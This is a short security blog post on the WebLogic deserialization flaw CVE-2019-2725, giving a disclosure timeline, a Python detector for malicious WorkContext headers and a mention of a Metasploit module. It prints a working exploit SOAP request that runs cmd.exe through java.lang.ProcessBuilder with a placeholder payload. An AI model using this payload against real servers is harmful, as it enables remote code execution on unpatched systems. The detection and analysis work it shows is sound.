This time, a short review.
Last Sunday (April 21st), the KnownSec 404 Team issued an alert about a new vulnerability being exploited in the wild: a 0day for WebLogic, as usual a deserialization vulnerability, this time in components deployed as web services (wls9_async and wls-wsat). Some days later (April 23rd) the China National Vulnerability Database [1], and then (April 25th) Oracle, released a Critical Patch Update Advisory [2] covering multiple vulnerabilities, some of them related.
Reviewing the technical information about the vulnerability in a bit more detail [3], we realized that the bug was straightforward to exploit, since it is an XML deserialization vulnerability very similar to some of those that appeared a couple of years ago for the same web container. The request is a plain SOAP message whose WorkContext header carries XMLDecoder-style elements:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                  xmlns:wsa="http://www.w3.org/2005/08/addressing"
                  xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <wsa:Action>RandomString</wsa:Action>
    <wsa:RelatesTo>RandomString</wsa:RelatesTo>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <void class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="3">
          <void index="0">
            <string>cmd.exe</string>
          </void>
          <void index="1">
            <string>/c</string>
          </void>
          <void index="2">
            <string>[HERE_THE_PAYLOAD]</string>
          </void>
        </array>
        <void method="start"/>
      </void>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body>
    <asy:onAsyncDelivery/>
  </soapenv:Body>
</soapenv:Envelope>
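Because the malicious request is ordinary SOAP, the WorkContext header is a cheap place to detect it: a legitimate WorkContext never asks the server to instantiate Java classes. The following is an added example (not code from the original post or from Oracle) that parses a captured request body and reports any XMLDecoder-style element carrying a class attribute inside that header; the URL prefixes for the affected endpoints and the sample messages are assumptions constructed for the example.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
WORK_NS = "http://bea.com/2004/06/soap/workarea/"
# XMLDecoder vocabulary: any of these with a class= attribute tells the
# server to instantiate an arbitrary Java class from the header.
XMLDECODER_TAGS = {"void", "object", "array", "new", "class"}
# Assumed URL prefixes of the wls9_async and wls-wsat web services.
AFFECTED_PREFIXES = ("/_async/", "/wls-wsat/")


def suspicious_classes(soap_body):
    """Java class names referenced by XMLDecoder-style elements inside a
    <work:WorkContext> SOAP header. Empty list means nothing was found;
    unparseable input is reported rather than silently ignored."""
    try:
        root = ET.fromstring(soap_body)
    except ET.ParseError:
        return ["<unparseable XML>"]
    header = root.find("{%s}Header" % SOAP_NS)
    if header is None:
        return []
    found = []
    for ctx in header.iter("{%s}WorkContext" % WORK_NS):
        for el in ctx.iter():
            if el.tag in XMLDECODER_TAGS and "class" in el.attrib:
                found.append(el.attrib["class"])
    return found


def matches_cve_2019_2725(path, soap_body):
    """True when a request hits an affected endpoint and its WorkContext
    header tries to instantiate classes through XMLDecoder."""
    on_affected = path.startswith(AFFECTED_PREFIXES)
    return on_affected and bool(suspicious_classes(soap_body))


# Constructed samples: one minimal WorkContext abuse, one benign request.
SAMPLE_MALICIOUS = """<soapenv:Envelope xmlns:soapenv="%s"
  xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header>
    <work:WorkContext xmlns:work="%s">
      <void class="java.lang.ProcessBuilder"><void method="start"/></void>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>""" % (SOAP_NS, WORK_NS)

SAMPLE_BENIGN = """<soapenv:Envelope xmlns:soapenv="%s"
  xmlns:asy="http://www.bea.com/async/AsyncResponseService">
  <soapenv:Header/>
  <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body>
</soapenv:Envelope>""" % SOAP_NS
```

Run it over request bodies logged by a reverse proxy or captured by an IDS; the class list gives the analyst the exact gadget the attacker tried to instantiate.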
Knowing this, we set out to run some tests, and that same day (April 25th) we had a Metasploit module ready to exploit the vulnerability, as you can see in the pull request [4].
The next day, Oracle released an emergency Security Alert Advisory about the vulnerability (CVE-2019-2725) [5].
We want to encourage the community to actively support the Metasploit project. It is an excellent tool that helps us in our pen-testing work.
References
[1] http://www.cnvd.org.cn/webinfo/show/4999
[2] https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
[4] https://github.com/rapid7/metasploit-framework/pull/11780
[5] https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html